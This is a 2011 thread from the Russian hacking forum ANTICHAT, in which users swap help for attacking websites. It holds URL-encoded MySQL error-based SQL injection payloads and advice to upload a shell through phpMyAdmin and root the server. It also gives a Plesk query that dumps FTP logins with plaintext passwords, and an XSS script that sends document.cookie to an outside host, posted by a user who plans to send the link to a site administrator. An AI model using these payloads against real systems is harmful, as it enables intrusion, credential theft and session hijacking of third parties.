ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
29.06.2011, 20:19
|
|
Новичок
Регистрация: 23.02.2010
Сообщений: 3
Провел на форуме:
46117
Репутация:
76
|
|
Подскажите плиз статью на вывод данный из mysql слепой инъекции через ошибку.
там чёто типа floor rand. токо не могу найти мануал...
|
|
|
29.06.2011, 20:47
|
|
Постоянный
Регистрация: 18.11.2009
Сообщений: 709
Провел на форуме:
1410429
Репутация:
214
|
|
|
|
|
|
29.06.2011, 20:56
|
|
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме:
371875
Репутация:
137
|
|
Сообщение от Sc0rpi0n
Sc0rpi0n said:
Подскажите плиз статью на вывод данный из mysql слепой инъекции через ошибку.
там чёто типа floor rand. токо не могу найти мануал...
вот тебе пример запроса:
Сообщение от None
+OR+%28SELECT+COUNT%28*%29+FROM+%28SELECT+1+UNION+ SELECT+2+UNION+SELECT+3%29x+GROUP+BY+CONCAT%28MID% 28%28select+{твой запрос}%29%29,1,63%29,+FLOOR%28RAND%280%29*2 %29%29%29--+
Сообщение от None
+OR+%28SELECT+COUNT%28*%29+FROM+%28SELECT+1+UNION+ SELECT+2+UNION+SELECT+3%29x+GROUP+BY+CONCAT%28MID% 28%28select+concat_ws%280x3a,user%28%29,version%28 %29,database%28%29%29%29,1,63%29,+FLOOR%28RAND%280 %29*2%29%29%29--+
|
|
|
|
01.07.2011, 01:31
|
|
Новичок
Регистрация: 07.02.2008
Сообщений: 13
Провел на форуме:
23254
Репутация:
5
|
|
Есть доступ к phpmyadmin. Нужно выудить ftp логин/пароль
Направте в нужном направлении информацией или чем капнуть туда?!
|
|
|
|
01.07.2011, 01:46
|
|
Новичок
Регистрация: 21.02.2009
Сообщений: 3
Провел на форуме:
58401
Репутация:
0
|
|
Сообщение от t0wer
t0wer said:
Есть доступ к phpmyadmin. Нужно выудить ftp логин/пароль
Направте в нужном направлении информацией или чем капнуть туда?!
pma - это скрипт для управления базами данных и никакого отношения к фтп не имеет. единственный вариант, который возможен - это залить шелл через pma, порутать сервак и выудить фтп акк)
клац
есть ещё вариант найти акк в конфигах сайта. на чём он стоит?
|
|
|
|
01.07.2011, 02:03
|
|
Guest
Сообщений: n/a
Провел на форуме:
262707
Репутация:
935
|
|
Сообщение от t0wer
t0wer said:
Есть доступ к phpmyadmin. Нужно выудить ftp логин/пароль
Направте в нужном направлении информацией или чем капнуть туда?!
Нужно зать что за ПО там стоит, и где хранятся пароли, бывает случаи (например Plesk Panell) где данные хранятся в базе, более того, в не зашифрованном виде, и для того что бы получить полный список всех фтп, достаточно выполнить:
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]SELECT REPLACE[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]sys_users[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]home[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'/home/httpd/vhosts/'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"]) AS[/COLOR][COLOR="#0000BB"]domain[/COLOR][COLOR="#007700"],
[/COLOR][COLOR="#0000BB"]sys_users[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]login[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]accounts[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]password FROM sys_users
LEFT JOIN accounts on sys_users[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]account_id[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]accounts[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]id
ORDER BY sys_users[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]home ASC[/COLOR][/COLOR]
Но в большинстве случаев, конечно же пароли так просто не достать, так что как минимум нужно закрепится, и начать исследовать систему изнутри.
|
|
|
|
01.07.2011, 17:20
|
|
Новичок
Регистрация: 16.09.2007
Сообщений: 1
Провел на форуме:
446
Репутация:
0
|
|
почему когда я ввожу
Сообщение от None
http://www.jertva.ru/search?q=
То в ифрейме выводит содержимое .js файла ? |
|
|
|
01.07.2011, 17:29
|
|
[Лишённый самовыражени
Регистрация: 16.01.2005
Сообщений: 1,787
Провел на форуме:
9751379
Репутация:
3812
|
|
эээээ.... а что должно быть там? если хочешь выполнения js кода, то юзай вместо
__________________
|
|
|
|
01.07.2011, 17:41
|
|
Новичок
Регистрация: 16.09.2007
Сообщений: 1
Провел на форуме:
446
Репутация:
0
|
|
Сообщение от +toxa+
+toxa+ said:
эээээ.... а что должно быть там? если хочешь выполнения js кода, то юзай вместо
Спасибо большое, там работает только iframe.
Получилось так:
Содержимое xss.php
Код:
Code:
img = new Image();
img.src = "http://httpz.ru/nlj6byr15oq.gif?"+document.cookie;
Теперь когда захожу по адресу, присылает:
Код:
Code:
IP: **.***.22.87
Query: empty
REFERER: http://site.ru/xss.php
AGENT: Mozilla/5.0 (Windows NT 5.1; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
это значит работает ? Можно админу отправлять на почту ссылку ? если бы были кукисы, оно бы мне прислало их ?
|
|
|
|
01.07.2011, 17:53
|
|
[Лишённый самовыражени
Регистрация: 16.01.2005
Сообщений: 1,787
Провел на форуме:
9751379
Репутация:
3812
|
|
зайди на site.ru , потом в адресной строке напиши
Код:
Code:
javascript:document.cookie='test_cookie=31337';
и попробуй заюзать свою xss ещё раз. узнаешь наверняка.
__________________
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
